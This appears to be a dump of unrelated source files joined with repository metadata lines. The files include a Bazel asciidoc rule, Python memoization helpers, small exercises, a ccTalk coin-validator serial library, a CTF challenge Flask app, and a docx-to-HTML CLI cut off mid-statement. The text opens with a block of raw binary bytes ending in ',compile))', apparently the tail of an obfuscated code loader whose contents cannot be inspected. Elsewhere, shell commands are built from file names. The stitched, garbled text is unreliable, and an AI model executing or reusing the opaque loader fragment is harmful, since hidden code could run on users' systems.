\xd0\x18\x02\x86\xd9\x10=\x16Y\x8a\xc7\xca\x87\x0e\x97\xefx-on.\x8500\xb1\xd9\x8d\xc8,\x11\x1b7\xdc\x9fq\t55\xfb\x8eE\xb1l4l\xb2\xdf\x0f\x7f?4\xdd\xef0\xd1\xac.\xc0\xcd\x85\x8f"_\x16\x01{\xe3\x87\x87\xf5\xf48\xac\x8d!\x82\xce/N\xae\xc7,\xf8p\xe0ps6)\xfe\x87\x83:ka\xba\xae>\xc0GS\x94\xb6\x90\xcep\x961N^\x0f\xb2O\xe6\x8d\xd9_J\xfe\xda=\xb3<\xa5?\x12\x8c\xae\x04\xb7U\xd2\xde\n\x95g\x116\xb4\xa0\xc1\xd8\x19gK\xf6\x93\xfeT:\x18\x91\x00g\xe7\xf4}\x86\xb5\x02\x0f\xdf<\x86\xb5\xc5\xf9t\x0e\x13%\x18\xd0\xa5\xe7?\x94"\xdb<\x92u3\xb4$\x00\x84g\x16"\xf3\xdc\xef\xfe\x94\x11k\xa2\xf9\x17\xd3\xfaH\xb0\xb85\xd7\xceoC\x01A^t\x0b\x9fl\x17\xfas\xf8\x18\xff7\x1f-\x8e+\xf8\xb2\xf4P,\x04F\xf6\x02\xcc\xc5xP=\xf8=,\x9c\x12g\xfaM\xa4\x16\xb1\x14\x8e\xb3\xa5?\xe9L19\x1e\xbd|\xfc\x8d~\x14\x9f\x8f\xd1\x9a\x0e\xdaG\xc8\x92\x15\xabm\xb1U\xb2\x98H\xb6f\x15H\xde\xcb\xe5\xcb\xfbX\x08\\+NPjlM\xc8Y7\x9e7R\xb2\xfaY\xa5\xe3K\xcf\xecf!g=C\xb9\xbb>.\x03\xf8\xd8\x80CC\x98\x82\xb5\x9c\x19h2\x07\x00\x17z\xe6\xecxB\xe1\x9c\xeb\x81\x91\x05\xb3\x1b,\x83\x03\x93nq(G\x83\x11\xeblL\xf0\x05O\x9bY\xdf\xd5\xd1X\xadv<\xc0h\x80\xdb\x86\r\xceKA\xbb~\xe3E\xf9\x1ddN7O\xcf\x86L\xabHj`3\xd4O\xe1G\xaa2\x96`\xb90Gh\x15:\x94\xf7\x9f\x8d\xd8;:\x86\x95\xf9Z{\x7f\xde\x84\xcb\xa6d\xff\x99\xe2\xfb`\x98\x0cG|\xd7\xa6v\xdcHH5?\x95/+q\xcaX\x8e\xaf\xf6\xff\x9e-\xe3\xa11\x96\xb5\x94\x1b\x08\x84\x05\x11\xac\x8b,\xa0)\n\x96\xfd\x1f\xf5\x99\xc7k\xbc\xfb\xf8\xee\xa4\xdd\x87Q\x90\x80,/\x90\x88m\x02\x84_g\x95/\xb7!\x8e\xc4lD\xc6\xe7\xb4\xb8v\xe6`\xdfT\xcbr@S\\\xf6\xf8\xfa\xad\xbfG\xdf\xa6\xde\xfe\xae\xfe\x9d\xbd\x88\xa2\x04\xd9-\xb5r\x07\xc0\x0b\xa5\x88N<eT\x9c\x1a\xf2y\xfd/V\x1e^\xa1x\\\xfc\xaa\xfe\x9d\\A0\xe3\xad\x12P\x9e\x8b\x80I\x0b\x83\xa8\xa0"\x1f\xeb\xbfms\x80\xd4\x10T\t\x00\\xy\x1d\x8e\x9dn\x14\xba\xb0\xea\xcbR&\x983\xdd\xe4\'\xc3nxp/\r;\xce\x1d\x0c\x10\xfc\x10\xd5\xa3\xdd}a\xa9H\xd7>\x18\xab\x0f\xf6\x0ewv\xdb\x87\x0f\xff\x1f@\x94\x99e',compile))
13,333
66,563
0.734133
ab9ca67f277a91dbee47ada211bbf6c5c38e0130
4,379
bzl
Python
kythe/docs/asciidoc.bzl
wcalandro/kythe
64969a853711c228b4e3cfc3ce91b84b5bb853d7
[ "Apache-2.0" ]
1,168
2015-01-27T10:19:25.000Z
2018-10-30T15:07:11.000Z
kythe/docs/asciidoc.bzl
wcalandro/kythe
64969a853711c228b4e3cfc3ce91b84b5bb853d7
[ "Apache-2.0" ]
2,811
2015-01-29T16:19:04.000Z
2018-11-01T19:48:06.000Z
kythe/docs/asciidoc.bzl
wcalandro/kythe
64969a853711c228b4e3cfc3ce91b84b5bb853d7
[ "Apache-2.0" ]
165
2015-01-27T19:06:27.000Z
2018-10-30T17:31:10.000Z
load("@bazel_skylib//lib:shell.bzl", "shell") load("@bazel_skylib//lib:paths.bzl", "paths") AsciidocInfo = provider( doc = "Information about the asciidoc-generated files.", fields = { "primary_output_path": "Path of the primary output file beneath {resource_dir}.", "resource_dir": "File for the directory containing all of the generated resources.", }, ) _toolchain_type = "//tools/build_rules/external_tools:external_tools_toolchain_type" def _asciidoc_impl(ctx): resource_dir = ctx.actions.declare_directory(ctx.label.name + ".d") primary_output = "{name}.html".format(name = ctx.label.name) # Declared as an output, but not saved as part of the default output group. # Build with --output_groups=+asciidoc_logfile to retain. logfile = ctx.actions.declare_file(ctx.label.name + ".logfile") # Locate the asciidoc binary from the toolchain and construct its args. asciidoc = ctx.toolchains[_toolchain_type].asciidoc args = ["--backend", "html", "--no-header-footer"] for key, value in ctx.attr.attrs.items(): if value: args.append("--attribute=%s=%s" % (key, value)) else: args.append("--attribute=%s!" % (key,)) if ctx.attr.example_script: args.append("--attribute=example_script=" + ctx.file.example_script.path) args += ["--conf-file=%s" % c.path for c in ctx.files.confs] args += ["-o", paths.join(resource_dir.path, primary_output)] args.append(ctx.file.src.path) # Get the path where all our necessary tools are located so it can be set # to PATH in our run_shell command. tool_path = ctx.toolchains[_toolchain_type].path # Resolve data targets to get input files and runfiles manifests. data, _, manifests = ctx.resolve_command(tools = ctx.attr.data) # Run asciidoc and capture stderr to logfile. If it succeeds, look in the # captured log for error messages and fail if we find any. ctx.actions.run_shell( inputs = ([ctx.file.src] + ctx.files.confs + ([ctx.file.example_script] if ctx.file.example_script else []) + data), input_manifests = manifests, outputs = [resource_dir, logfile], arguments = args, command = "\n".join([ "set -e", "mkdir -p {resource_dir}".format(resource_dir = shell.quote(resource_dir.path)), # Run asciidoc itself, and fail if it returns nonzero. "{asciidoc} \"$@\" 2> >(tee -a {logfile} >&2)".format( logfile = shell.quote(logfile.path), asciidoc = shell.quote(asciidoc), ), # The tool succeeded, but now check for error diagnostics. 'if grep -q -e "filter non-zero exit code" -e "no output from filter" {logfile}; then'.format( logfile = shell.quote(logfile.path), ), "exit 1", "fi", # Move SVGs to the appropriate directory. "find . -name '*.svg' -maxdepth 1 -exec mv '{{}}' {out}/ \\;".format(out = shell.quote(resource_dir.path)), ]), env = {"PATH": tool_path}, mnemonic = "RunAsciidoc", ) return [ DefaultInfo(files = depset([resource_dir])), OutputGroupInfo(asciidoc_logfile = depset([logfile])), AsciidocInfo(primary_output_path = primary_output, resource_dir = resource_dir), ] asciidoc = rule( implementation = _asciidoc_impl, toolchains = ["//tools/build_rules/external_tools:external_tools_toolchain_type"], attrs = { "src": attr.label( doc = "asciidoc file to process", allow_single_file = True, ), "attrs": attr.string_dict( doc = "Dict of attributes to pass to asciidoc as --attribute=KEY=VALUE", ), "confs": attr.label_list( doc = "`conf-file`s to pass to asciidoc", allow_files = True, ), "data": attr.label_list( doc = "Files/targets used during asciidoc generation. Only needed for tools used in example_script.", allow_files = True, ), "example_script": attr.label( doc = "Script to pass to asciidoc as --attribute=example_script=VALUE.", allow_single_file = True, ), }, doc = "Generate asciidoc", )
41.704762
119
0.611784
e624c79117e6ad5ea768a2205621a752851da45a
1,345
py
Python
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/intro/decorator_utils.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/intro/decorator_utils.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/intro/decorator_utils.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
# Beispielprogramm für das Buch "Python Challenge" # # Copyright 2020 by Michael Inden import functools # handgestrickt def decorate_with_memo(func): lookup_map = dict() @functools.wraps(func) def helper(n): # MEMOIZATION: prüfe, ob vorberechnetes Ergebnis existiert if n in lookup_map: return lookup_map[n] result = func(n) # MEMOIZATION: speichere berechnetes Ergebnis lookup_map[n] = result return result return helper # Memoization nicht so klar ersichtlich def decorate_with_memo_shorter_one_param(func): lookup_map = dict() @functools.wraps(func) def helper(n): if n not in lookup_map: lookup_map[n] = func(n) return lookup_map[n] return helper def decorate_with_memo_shorter_orig(func): lookup_map = dict() @functools.wraps(func) def helper(*args): if args in lookup_map: return lookup_map[args] else: result = func(*args) lookup_map[args] = result return result return helper def decorate_with_memo_shorter(func): lookup_map = dict() @functools.wraps(func) def helper(*args): if args not in lookup_map: lookup_map[args] = func(*args) return lookup_map[args] return helper
20.074627
66
0.633457
fb07bb97aefdc6435635740fdd659d5ee7cf5533
646
py
Python
tests/onegov/pay/conftest.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
tests/onegov/pay/conftest.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
tests/onegov/pay/conftest.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
import pytest import transaction from onegov.pay.models import Payment @pytest.fixture(scope='function', autouse=True) def reset_payment(): yield # during testing we need to reset the links created on the payment # model - in reality this is not an issue as we don't define the same # models over and over classes = [Payment] while classes: cls = classes.pop() for key in (Payment.registered_links or tuple()): del cls.__mapper__._props[key] classes.extend(cls.__subclasses__()) if Payment.registered_links: Payment.registered_links.clear() transaction.abort()
23.071429
73
0.682663
fd1bb520973ae33e6e5d32eeaf2b640688ce4e41
449
py
Python
Curso-Em-Video-Python/2Exercicios/017_Catetos_e_Hipotenusa.py
pedrohd21/Cursos-Feitos
b223aad83867bfa45ad161d133e33c2c200d42bd
[ "MIT" ]
null
null
null
Curso-Em-Video-Python/2Exercicios/017_Catetos_e_Hipotenusa.py
pedrohd21/Cursos-Feitos
b223aad83867bfa45ad161d133e33c2c200d42bd
[ "MIT" ]
null
null
null
Curso-Em-Video-Python/2Exercicios/017_Catetos_e_Hipotenusa.py
pedrohd21/Cursos-Feitos
b223aad83867bfa45ad161d133e33c2c200d42bd
[ "MIT" ]
null
null
null
from math import hypot co = float(input('Quanto medo o cateto oposto: ')) ca = float(input('Quanto medo o cateto adjacente: ')) hipotenusa = hypot(co, ca) '''hipotenusa = (ca**2 + co**2) ** (1/2) formula matematica print('O a soma dos quadrado dos catetos de um triângulo retângulo é igual ao quadrado de sua hipotenusa: {:.2f}'.format(hipotenusa))''' '''Formula Facil pelo math abaixo ''' print('A soma da hipotenusa é {:.2f}'.format(hipotenusa))
44.9
136
0.703786
239f39d43572c6dd8b67d39196a62f04b93137ae
527
py
Python
IVTa/2014/ALEKSEEV_I_S/task_3_50.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
IVTa/2014/ALEKSEEV_I_S/task_3_50.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
IVTa/2014/ALEKSEEV_I_S/task_3_50.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
# Задача 3. Вариант 50. # Напишите программу, которая выводит имя "Саид-Мурадзола Садриддин", и запрашивает его псевдоним. #Программа должна сцеплять две эти строки и выводить полученную строку, #разделяя имя и псевдоним с помощью тире. # Alekseev I.S. # 15.05.2016 name = "Саид-Мурадзола Садриддин" print("Герой нашей сегоднящней программы - " + name) alias = input("Под каким же именем мы знаем этого человека? Ваш ответ: ") #вводим Айни print("Все верно: " + name + " - " + alias) input("\n\nНажмите Enter для выхода.")
32.9375
99
0.732448
23baafab3de4686aa7f0b8672a42c0db1845e871
256
py
Python
Problems/Stack/Easy/RemoveAllAdjacentDuplicatesInString/test_remove_duplicates.py
dolong2110/Algorithm-By-Problems-Python
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
[ "MIT" ]
1
2021-08-16T14:52:05.000Z
2021-08-16T14:52:05.000Z
Problems/Stack/Easy/RemoveAllAdjacentDuplicatesInString/test_remove_duplicates.py
dolong2110/Algorithm-By-Problems-Python
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
[ "MIT" ]
null
null
null
Problems/Stack/Easy/RemoveAllAdjacentDuplicatesInString/test_remove_duplicates.py
dolong2110/Algorithm-By-Problems-Python
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
[ "MIT" ]
null
null
null
from unittest import TestCase from remove_duplicates import removeDuplicates class Test(TestCase): def test_remove_duplicates(self): self.assertEqual(removeDuplicates("abbaca"), "ca") self.assertEqual(removeDuplicates("azxxzy"), "ay")
32
58
0.753906
7bca982bd072e67d2d8cbc89ef9e46683acc55dc
7,527
py
Python
backend/cctalk/tools.py
bytebang/ppvm
07a0650c618b9dd6abc7563070a80c132034f532
[ "MIT" ]
null
null
null
backend/cctalk/tools.py
bytebang/ppvm
07a0650c618b9dd6abc7563070a80c132034f532
[ "MIT" ]
null
null
null
backend/cctalk/tools.py
bytebang/ppvm
07a0650c618b9dd6abc7563070a80c132034f532
[ "MIT" ]
null
null
null
""" Provides tools for general use. Module content -------------- """ # The python-cctalk package allows one to send ccTalk messages and decode replies from a coin validator. license_text = "(C) 2011 David Schryer GNU GPLv3 or later." __copyright__ = license_text __autodoc__ = ['make_serial_object', 'drop_to_ipython', 'make_msg', 'send_packet_and_get_reply', 'interpret_reply'] __all__ = __autodoc__ from IPython.frontend.terminal.embed import InteractiveShellEmbed import os import serial import time import subprocess from struct import unpack def make_msg(code, data=None, to_slave_addr=2, from_host_addr=1): """Makes a ccTalk message from a ccTalk code and data to be sent with this packet. Parameters ---------- code : int ccTalk code for this message. data : list of integers Data to be sent in this message. to_slave_addr : int Address of slave to be sent to. Defaults to 2. from_host_addr : int Address of host that is sending the message. Defaults to 1. Returns ------- packet : list of integers An integer equivalent of the ccTalk packet. This needs to be converted to a byte packet prior to sending. """ if not data: seq = [to_slave_addr, 0, from_host_addr, code] else: seq = [to_slave_addr, len(data), from_host_addr, code] + data packet_sum = 0 for i in seq: packet_sum += i end_byte = 256 - (packet_sum%256) packet = seq + [end_byte] return packet def send_packet_and_get_reply(serial_object, packet_holder, initial_wait=0.05, total_wait=1, debug=True, verbose=True): """Sends a packet and gets a reply. Parameters ---------- serial_object : object made with :py:func:`cctalk.tools.make_serial_object` Serial communication object. packet_holder : Holder Holder containing the packet and extended information about the packet being send. See :py:class:`cctalk.coin_messenger.CoinMessenger` for Holder construction. initial_wait : float Time in seconds before probing for a reply. Defaults to 0.05 seconds. total_wait : float Time in seconds before giving up. Defaults to 1 second. debug : bool Flag to send out debug messages. verbose : bool Flag to be more verbose. Returns ------- reply_msg : message recieved from :py:func:`cctalk.tools.interpret_reply` if reply_msg is False, no reply was obtained. Raises ------ UserWarning If a reply was obtained but :py:func:`cctalk.tools.interpret_reply` returned False. """ h = packet_holder packet = h.packet byte_msg = h.byte_message s = time.time() serial_object.write(packet) time.sleep(initial_wait) while True: t = time.time() - s if t > total_wait: break raw = serial_object.read(serial_object.inWaiting()) if len(raw) > 1: len_raw = len(raw) out_byte = unpack('={0}c'.format(int(len_raw)), raw) out_int = list(map(ord, out_byte)) if verbose: print('Recieved original packet int: {0} byte:{1}'.format(out_int, out_byte)) if len(out_byte) == len(byte_msg) and debug: print('Recieved original packet int: {0} byte:{1}'.format(out_int, byte_msg)) elif len(out_byte) < len(byte_msg) and debug: print('Recieved small packet int: {0} byte:{1}'.format(out_int, byte_msg)) else: # The first part of the return is the echo in the line # (a repeat of the message sent). start_index = 5 + h.bytes_sent reply_packet = out_byte[start_index:] reply_msg = interpret_reply(reply_packet, packet_holder, verbose=verbose) if reply_msg: return reply_msg else: msg = "A bad reply was recieved." raise UserWarning(msg, (reply_packet, reply_msg)) return False def interpret_reply(reply_byte, packet_holder, verbose=False): """Interprets a reply byte message. Parameters ---------- reply_byte : byte message returned from serial_object.read(serial_object.inWaiting()) Often the reply contains an echo of the message sent. This part should be removed first. packet_holder : Holder Holder containing the packet and extended information about the packet that was originally sent. See :py:class:`cctalk.coin_messenger.CoinMessenger` for Holder construction. verbose : bool Flag to be more verbose. Returns ------- reply : The type dependes on the type expected. Reply to the message in the type expected. Raises ------ UserWarning If a simple pool did not return an expected message. Assumes 1,2 for send recieve hosts. """ h = packet_holder reply_length = h.bytes_returned reply_type = h.type_returned reply_int = list(map(ord, reply_byte)) if len(reply_int) < 2: print('Recieved small packet int: {0} byte:{1}'.format(reply_int, reply_byte)) return False msg_length = reply_int[1] if verbose: print("Recieved {0} bytes:".format(msg_length)) if msg_length != reply_length: print('Message length != return_length. ml: {0} rl:{1}'.format(msg_length, reply_length)) return False if h.request_code == 254: expected_reply = [1, 0, 2, 0, 253] if reply_int != expected_reply: msg = "Simple pool did not return expected message." raise UserWarning(msg, (reply_int, expected_reply)) reply_msg_int = reply_int[4:-1] reply_msg_byte = reply_byte[4:-1] if reply_type is str: return str().join(reply_msg_byte) elif reply_type is int: return reply_msg_int elif reply_type is bool: return True else: return reply_msg_byte def make_serial_object(port_name): """Makes a serial object that can be used for talking with the coin validator. port_type is a string that can currently only be equal to 'coin_validator'. Paramters --------- port_type : str Type of port to connect to. Currently only 'coin_validator is valid.' Returns ------- serial_object : object made by :py:class:`serial.Serial` """ return serial.Serial(port=port_name, baudrate=9600, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, xonxoff=True, ) def drop_to_ipython(local_variables, *variables_to_inspect): ''' Drops to ipython at the point in the code where it is called to inspect the variables passed to it. Parameters ---------- local_variables : list Usually one would pass the output of locals(). variables_to_inspect: tuple All variables passed to this routine are wrapped into a tuple. ''' try: call_name = local_variables['self'].__module__ except Exception: call_name = "Module" b = 'Dropping into IPython' em = 'Leaving Interpreter, back to program.' msg = '***Called from %s. Hit Ctrl-D to exit interpreter and continue program.' ipshell = InteractiveShellEmbed([], banner1=b, exit_msg=em) ipshell(msg %(call_name))
32.868996
115
0.634649
a99ad5868185e1054df2d7b8b74429cdab82171a
1,533
py
Python
frds/mktstructure/measures/price_impact.py
mgao6767/wrds
7dca2651a181bf38c61ebde675c9f64d6c96f608
[ "MIT" ]
1
2022-03-06T20:36:06.000Z
2022-03-06T20:36:06.000Z
mktstructure/measures/price_impact.py
mgao6767/mktstructure
5432c1bed163f838209d34b74c09629bea620ba8
[ "MIT" ]
null
null
null
mktstructure/measures/price_impact.py
mgao6767/mktstructure
5432c1bed163f838209d34b74c09629bea620ba8
[ "MIT" ]
null
null
null
import numpy as np import pandas as pd from .exceptions import * name = "PriceImpact" description = """ The price impact is 2 * q * (midpoint_5min - midpoint) / midpoint where q is the trade direction (1 for buys and -1 for sells), midpoint is bid-ask midpoint, and midpoint_5min is the bid-ask midpoint 5min later. """ vars_needed = {"Price", "Volume", "Mid Point", "Direction"} def estimate(data: pd.DataFrame) -> np.ndarray: if not vars_needed.issubset(data.columns): raise MissingVariableError(name, vars_needed.difference(data.columns)) midpt = data["Mid Point"].to_numpy() timestamps = np.array(data.index, dtype="datetime64") # Find the Quote Mid Point 5 min later than each trade. matched_midpt = [] for idx, ts1 in enumerate(timestamps): for i, ts2 in enumerate(timestamps[idx:]): if ts2 - ts1 >= np.timedelta64(5, "m"): matched_midpt.append(midpt[idx + i]) break matched = len(matched_midpt) directions = data["Direction"].to_numpy()[:matched] pimpact = 2 * directions * (matched_midpt - midpt[:matched]) / midpt[:matched] # Daily price impact is the dollar-volume-weighted average # of the price impact computed over all trades in the day. price = data["Price"].to_numpy() volume = data["Volume"].to_numpy() dolloar_volume = np.multiply(volume, price)[:matched] pimpact = np.sum(np.multiply(pimpact, dolloar_volume) / np.sum(dolloar_volume)) return np.nan if np.isnan(pimpact) else pimpact
38.325
84
0.679713
a5ebb807ff741ef8001b2a69f8057b5972fd93d4
1,878
py
Python
tarefas-poo/lista-03/balde/view/interface_com_usuario.py
victoriaduarte/POO_UFSC
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
[ "MIT" ]
null
null
null
tarefas-poo/lista-03/balde/view/interface_com_usuario.py
victoriaduarte/POO_UFSC
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
[ "MIT" ]
null
null
null
tarefas-poo/lista-03/balde/view/interface_com_usuario.py
victoriaduarte/POO_UFSC
0c65b4f26383d1e3038d8469bd91fd2c0cb98c1a
[ "MIT" ]
null
null
null
# -------------------------- # UFSC - CTC - INE - INE5663 # Exercício do Balde # -------------------------- # Classe que representa a interface com o usuário # from view.menu import Menu from view.paineis.painel_cria_baldes import PainelCriaBaldes from view.paineis.painel_destroi_baldes import PainelDestroiBaldes from view.paineis.painel_manipula_baldes import PainelManipulaBaldes class InterfaceComUsuario: def __init__(self): self._baldes = None # inicialmente não há baldes definidos opcoes_sem_balde = { 0: 'Sair', 1: 'Criar Baldes' } opcoes_com_balde = { 0: 'Sair', 1: 'Destruir Baldes', 2: 'Manipular Baldes' } self._menu_sem_baldes = Menu('Programa Baldes', opcoes_sem_balde) self._menu_com_baldes = Menu('Programa Baldes', opcoes_com_balde) def interaja(self): terminar = False while not terminar: if self._baldes is None: menu = self._menu_sem_baldes opcao = menu.pergunte() if opcao == 0: terminar = True elif opcao == 1: criador = PainelCriaBaldes() criador.crie(self) else: menu = self._menu_com_baldes opcao = menu.pergunte() if opcao == 0: terminar = True elif opcao == 1: destruidor = PainelDestroiBaldes() destruidor.destrua(self) elif opcao == 2: manipulador = PainelManipulaBaldes() manipulador.manipule(self._baldes[0], self._baldes[1]) def armazene_baldes(self, baldeA, baldeB): self._baldes = (baldeA, baldeB) def destrua_baldes(self): self._baldes = None
32.947368
74
0.546858
93a51902285ff3561d20e3b1bfd2d2a16c459863
3,337
py
Python
2018/finals/web-mitigator/app/main.py
iicarus-bit/google-ctf
4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b
[ "Apache-2.0" ]
2,757
2018-04-28T21:41:36.000Z
2022-03-29T06:33:36.000Z
2018/finals/web-mitigator/app/main.py
iicarus-bit/google-ctf
4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b
[ "Apache-2.0" ]
20
2019-07-23T15:29:32.000Z
2022-01-21T12:53:04.000Z
2018/finals/web-mitigator/app/main.py
iicarus-bit/google-ctf
4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b
[ "Apache-2.0" ]
449
2018-05-09T05:54:05.000Z
2022-03-30T14:54:18.000Z
#!/usr/bin/python # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from flask import Flask, redirect, request, make_response, send_from_directory from google.cloud import tasks_v2beta3 import logging from urllib.parse import urlencode, quote_plus client = tasks_v2beta3.CloudTasksClient() parent = client.queue_path('ctf-web-kuqo48d', 'europe-west1', 'xss') SECRET_URL = '917fh3h5721' app = Flask(__name__, static_url_path='') app.url_map.host_matching = (__name__ != '__main__') @app.route('/', host="bountyplz-mitigator.web.ctfcompetition.com", methods=['GET', 'POST']) def bountyplz(): """Return XSS and BugBounty Form (for PoCs/xss bot)""" poc = request.form.get('poc', '') if poc.startswith("http"): task = { 'app_engine_http_request': { 'app_engine_routing': { 'service': 'uxssbot', }, 'http_method': 'POST', 'relative_uri': '/submit?%s'%urlencode({'service': 'mitigator', 'url': poc}, quote_via=quote_plus), 'body': urlencode({'service': 'mitigator', 'url': poc}, quote_via=quote_plus).encode(), } } res = client.create_task(parent, task) logging.info('Created uxssbot task: ' + res.name) return """We have received your bug report.""" return """ <html> <script src='https://www.google.com/recaptcha/api.js'></script> <form method=post action=/> <div class="g-recaptcha" data-sitekey="6LfR1XUUAAAAAPGx2NejNMYImdoRW9PZLQcFtBN_"></div> <input type=url name=poc placeholder="PoC URL" value=%s> <input type=submit> </form> </html>"""%poc @app.route('/' + SECRET_URL, host="mitigator.web.ctfcompetition.com") def login(): """Redirect the user to the SEM""" token = request.cookies.get('flag', 'public-demo') return redirect("/" + SECRET_URL + ".html?flag=" + token) @app.route('/', host="mitigator.web.ctfcompetition.com") def backtopwn(): """Redirect the user to pwnable""" return redirect("http://mitigator.ctfcompetition.com:1337/index.html") @app.route('/' + SECRET_URL + '.html', host="mitigator.web.ctfcompetition.com") def sem(): response = make_response(app.send_static_file('sem.html')) response.headers['content-security-policy'] = "default-src 'none'; style-src 'sha256-a6K5yWfSJ1D3n7JPrbZVrFADjNGla8XNjwqREOH1FFs='; script-src 'sha256-hJezPHmyLh3996xSSmcHvy0la57OWfPoGhLKvt40LGA=' 'sha256-9TaiPuyxl5StNVGXWFGVh2SHM62NJ9KT462mtr8Jd7Q=' https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js; object-src 'none'; connect-src 'self'; report-uri https://bountyplz-mitigator.web.ctfcompetition.com/"; return response @app.route('/secret/<path:path>', host="mitigator.web.ctfcompetition.com") def proxy(path): return app.send_static_file('secret/' + path) if __name__ == '__main__': app.run(host='0.0.0.0', port=8080, debug=True)
42.782051
422
0.706023
9e13297bcad332cae21c3a3453309ecd98fd058b
956
py
Python
data/data_loader.py
florianfricke/Bachelor_Thesis_Sentiment_Analyse
aa1fa95cfbc13115ee60baaf79eab0d1940998ab
[ "MIT" ]
1
2020-06-04T13:20:45.000Z
2020-06-04T13:20:45.000Z
data/data_loader.py
florianfricke/Bachelor_Thesis_Sentiment_Analyse
aa1fa95cfbc13115ee60baaf79eab0d1940998ab
[ "MIT" ]
6
2020-06-03T18:45:11.000Z
2022-02-10T01:51:03.000Z
data/data_loader.py
florianfricke/Bachelor_Thesis_Sentiment_Analyse
aa1fa95cfbc13115ee60baaf79eab0d1940998ab
[ "MIT" ]
null
null
null
""" Created by Florian Fricke. """ import os from utilities.utilities import clean_text from os.path import join class DataLoader: def __init__(self): self._dirname = os.path.dirname(__file__) def get_data(self, filename, seperator="\t", sentiment_column_number=0, text_column_number=1): data = list() for line_id, line in enumerate( open(join(self._dirname, filename), "r", encoding="utf-8").readlines()): try: columns = line.rstrip().split(seperator) sentiment = columns[sentiment_column_number] text = clean_text(" ".join(columns[text_column_number:])) if text != "Not Available": data.append((sentiment, text)) except Exception: print("\nWrong format in line:{} in file:{}".format( line_id, filename)) raise Exception return data
30.83871
98
0.58159
1923d29de7080a5e45efd66b8d2643600e031f38
664
py
Python
source/test/test_templatehandler.py
marctrommen/bloggenerator
5b4fed4cd12a899829261d492328dfc39a78153d
[ "MIT" ]
null
null
null
source/test/test_templatehandler.py
marctrommen/bloggenerator
5b4fed4cd12a899829261d492328dfc39a78153d
[ "MIT" ]
null
null
null
source/test/test_templatehandler.py
marctrommen/bloggenerator
5b4fed4cd12a899829261d492328dfc39a78153d
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import unittest import templatehandler class TemplateHandlerTest(unittest.TestCase): def __init__(self, *args, **kwargs): super(TemplateHandlerTest, self).__init__(*args, **kwargs) def test_getPage(self): th = templatehandler.TemplateHandler() self.assertEqual(len(th.getPage()), 1924, "incorrect file size") def test_getBlogpost(self): th = templatehandler.TemplateHandler() self.assertEqual(len(th.getBlogpost()), 656, "incorrect file size") def test_getBlogpostKeyword(self): th = templatehandler.TemplateHandler() self.assertEqual(len(th.getBlogpostKeyword()), 79, "incorrect file size")
27.666667
75
0.746988
2709581564c8e67ff6eb7794622e5fc13124691b
4,482
py
Python
convertx/cli.py
VolkerBergen/convertx
3d11f94e5ff20b17381c626848fe26e82a5c9cb7
[ "BSD-2-Clause" ]
null
null
null
convertx/cli.py
VolkerBergen/convertx
3d11f94e5ff20b17381c626848fe26e82a5c9cb7
[ "BSD-2-Clause" ]
5
2022-01-06T20:34:22.000Z
2022-01-17T14:58:05.000Z
convertx/cli.py
VolkerBergen/convertx
3d11f94e5ff20b17381c626848fe26e82a5c9cb7
[ "BSD-2-Clause" ]
1
2022-01-05T13:17:57.000Z
2022-01-05T13:17:57.000Z
import argparse import io import os import sys from datetime import date, datetime from mammoth import convert, writers from html2text import html2text from .styles import style_mappings, style_mappings_md, check_comments def main(): argv = [arg for arg in sys.argv if not arg.startswith('--')] argv_dir = ' '.join([arg for arg in sys.argv if arg.startswith('--')]) command = 'find -s . -name "*docx*" -print0 | while IFS= read -r -d "" filename; do\n' # find docx files command += 'convertx "$filename" "${filename//docx/html}"' # execute convertx command command += ' {}\ndone'.format(argv_dir) # add input/output directories # `convertx` to loop through directory for conversion if (len(argv) == 1): os.system(command) # `convertx html` to loop through directory for conversion elif (len(argv) == 2) and ('html' in argv[-1]): os.system(command) # `convertx markdown` to loop through directory for conversion elif (len(argv) == 2) and ('markdown' in argv[-1]): os.system(command.replace('html', 'md')) # `convertx filename.docx` for html conversion into filename.html elif len(argv) == 2: filename_docx = argv[-1] filename_html = filename_docx.replace("docx", "html") os.system('convertx "{}" "{}"'.format(filename_docx, filename_html)) # actual html or markdown conversion else: args = _parse_args() outdir = args.output_dir if outdir is not None and not os.path.exists(outdir): os.makedirs(outdir) is_valid = (not '~$' in args.path) and (not '/._' in args.path) is_selected = (args.input_dir is None) or (args.input_dir in args.path) mtime = 